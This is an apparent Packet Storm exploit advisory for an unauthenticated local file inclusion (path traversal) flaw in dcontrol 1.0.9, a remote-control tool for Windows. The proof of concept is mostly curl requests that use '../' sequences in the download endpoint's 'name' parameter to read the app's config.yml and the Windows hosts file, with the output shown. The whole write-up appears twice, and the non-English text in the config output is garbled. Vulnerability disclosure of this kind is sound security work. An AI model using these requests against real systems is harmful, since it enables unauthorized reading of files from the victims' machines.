Description
dcontrol version 1.0.9 suffers from an unauthenticated local file inclusion vulnerability via a path traversal...
Basic Information
ID
PACKETSTORM:219189
Published
Apr 20, 2026 at 00:00
Affected Product
Affected Versions
# Exploit Title: dcontrol v1.0.9 - Unauthenticated Local File Inclusion
(LFI)
# Date: 2026-04-18
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://github.com/dhjz/dcontrol
# Software Link:
https://github.com/dhjz/dcontrol/releases/download/1.0.9/dcontrol.exe
# Version: 1.0.9
# Tested on: Windows 10, Windows 11
# Description:
dcontrol is vulnerable to Local File Inclusion (LFI) via path traversal in
the
/control-api/file/download endpoint. An unauthenticated attacker can read
arbitrary files from the target system by supplying directory traversal
sequences (../) in the 'name' parameter.
# Proof of Concept:
1. Read the application configuration file:
curl "http://TARGET_IP:666/control-api/file/download?name=../config.yml"
name: "čżç¨ć§ĺś"
port: 666
open: false
volume: true
dir: files
apps:
- name: 垎俥
path: E:\Program Files (x86)\Tencent\WeChat\WeChat.exe
- name: ç˝ćäş
path: E:\Program Files (x86)\NetEase\CloudMusic\cloudmusic.exe
2. Read Windows hosts file:
curl "
http://TARGET_IP:666/control-api/file/download?name=../../../../../../Windows/System32/drivers/etc/hosts
"
# Copyright (c) 1993-2009 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
# 102.54.94.97 rhino.acme.com # source server
# 38.25.63.10 x.acme.com # x client host
# localhost name resolution is handled within DNS itself.
# 127.0.0.1 localhost
# ::1 localhost
(LFI)
# Date: 2026-04-18
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://github.com/dhjz/dcontrol
# Software Link:
https://github.com/dhjz/dcontrol/releases/download/1.0.9/dcontrol.exe
# Version: 1.0.9
# Tested on: Windows 10, Windows 11
# Description:
dcontrol is vulnerable to Local File Inclusion (LFI) via path traversal in
the
/control-api/file/download endpoint. An unauthenticated attacker can read
arbitrary files from the target system by supplying directory traversal
sequences (../) in the 'name' parameter.
# Proof of Concept:
1. Read the application configuration file:
curl "http://TARGET_IP:666/control-api/file/download?name=../config.yml"
name: "čżç¨ć§ĺś"
port: 666
open: false
volume: true
dir: files
apps:
- name: 垎俥
path: E:\Program Files (x86)\Tencent\WeChat\WeChat.exe
- name: ç˝ćäş
path: E:\Program Files (x86)\NetEase\CloudMusic\cloudmusic.exe
2. Read Windows hosts file:
curl "
http://TARGET_IP:666/control-api/file/download?name=../../../../../../Windows/System32/drivers/etc/hosts
"
# Copyright (c) 1993-2009 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
# 102.54.94.97 rhino.acme.com # source server
# 38.25.63.10 x.acme.com # x client host
# localhost name resolution is handled within DNS itself.
# 127.0.0.1 localhost
# ::1 localhost